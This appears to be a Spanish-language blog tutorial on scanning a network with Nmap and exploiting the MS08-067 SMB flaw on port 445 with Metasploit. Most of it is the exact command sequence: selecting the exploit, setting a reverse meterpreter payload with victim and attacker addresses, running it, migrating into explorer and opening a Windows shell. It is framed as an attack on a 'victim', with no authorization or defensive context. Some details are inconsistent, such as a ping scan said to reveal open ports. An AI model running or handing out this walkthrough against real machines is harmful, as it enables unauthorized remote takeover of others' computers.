TUTORIAL: ¿COMO DETECTAR UNA VULNERABILIDAD Y EXPLOTARALA?


DETECTANDO UNA VULNERABILIDAD CON NMAP Y EXPLOTANDOLA CON METASPLOIT

En esta guía veremos rápidamente un ejemplo de como detectar un par de vulnerabilidades en windows con Nmap y explotar una de ellas con comandos en Metasploit. 

Procedemos a escanear los puertos la maquina por medio de de la ip con el comando Nmap y la IP. de la PC a escanear, en este caso por ser un ejemplo se trata de una localhost. 



Vulnerabilidades halladas :
Amenaza Alta
-Puerto 135    -Abierto   - Ejecutando servicio Microsoft Remote Procedure Call 

Exploit :       

-msrpc_dcom_ms03_026:

(MS03-026 Desbordamiento de interfaz Microsoft RPC DCOM)

Este modulo explota un desbordamiento de buffer de pila en el servicio RPCSS

Payload :  -  Uno de los posibles payloads  a utilizar es el “reverse_meterpreter” que permite cargar una shell meta interprete de ordenes en el equipo de la victima tomando el control de los procesos y la cmd de la victima entre otras acciones maliciosas.

 

Amenaza critica
-Puerto 445    -Abierto      Ejecutando Servicio Microsoft-ds 

Exploit :         - ms08_067_netapi

Payload:         - meterpreter/reverse_tcp 

---------------------------------------------------------------------------------------------------------------

                                               EXPLOTACION

En este caso explotaremos la vulnerabilidad hallada en el puerto 445 que se encuentra ejecutando "Microsoft-ds" por medio del exploit "ms08_067_netapi" al cual le estableceremos el payload "meterpreter/reverse_tcp". 

-ESCANEANDO
root-bt:~# nmap -sP 192.168.1.0-255 [enter]

Esto suponiendo que estamos en la red 192.168.0.0 
Esperamos a que termine el escaneo, si encontramos una IP con el puerto 445/tcp Microsoft-ds, es un computador que posee una vulnerabilidad.


EXPLOTANDO CON COMANDOS EN METASPLOIT

root-bt:~#msfconsole [enter]

Esperamos unos minutos a que se carge la consola.


msf> search windows/smb/ms [enter]


Un vez finalizado el search, debemos buscar el exploit exploit/windows/smb/ms08_067_netapi.

msf> use exploit/windows/smb/ms08_067_netapi [enter]
msf> exploit (ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp [enter]

 De este modo la pc de la victima se conectara a usted y no usted a ella, por otra parte debemos especificar los host remotos y locales.

msf> exploit (ms08_067_netapi) > show options [enter]
msf> exploit (ms08_067_netapi) > set rhost ip_address_victima [enter]
msf> exploit (ms08_067_netapi) > set lhost ip_address_atacante [enter]

Ahora para ejecutar finalmente el Exploit :
msf> exploit (ms08_067_netapi) > exploit [enter]

Si temenos exito, debe aparecer una un prompt como este:

meterpreter> _

Si es así, ejecute el siguiente comando para determinar cual es su PID (Proceso ID).

meterpreter> pid [enter]
meterpreter> ps [enter]  // Para ver los procesos, y emigrarlo por ejemplo al proceso de "Explorer" que permanece abierto

meterpreter> migrate [pid explorer] [enter]

Este ultimo comando para entrar al Shell de Windows/System32

meterpreter> shell [enter]       


TUT0RIAL

 

Share this

Related Posts

Previous
Next Post »

Entrada destacada

¿CUAL ES LA DIFERENCIA ENTRE DISCO DURO, RAM, CACHE Y BUFFER?

¿CUAL ES LA DIFERENCIA ENTRE DISCO DURO, RAM, CACHÉ Y BUFFER? Es común que muchas personas se confundan respecto a las diferencias ...